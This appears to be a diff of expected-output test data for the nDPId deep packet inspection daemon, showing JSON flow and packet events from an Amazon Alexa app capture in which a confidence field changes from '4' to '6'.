+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) 
Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -370,77 +370,77 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1490976071312,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976071312,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WllAAEARM1ysECrYrBAqAWH5ADUAKtG2BusBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1490976071389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976071389,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl2DBAAEARtV2sECoBrBAq2AA1YfkAUYstBuuBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADUACwhwaXRhbmd1acASwC4AAQABAAAANQAENF7ohg=="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 
+00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., 
CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 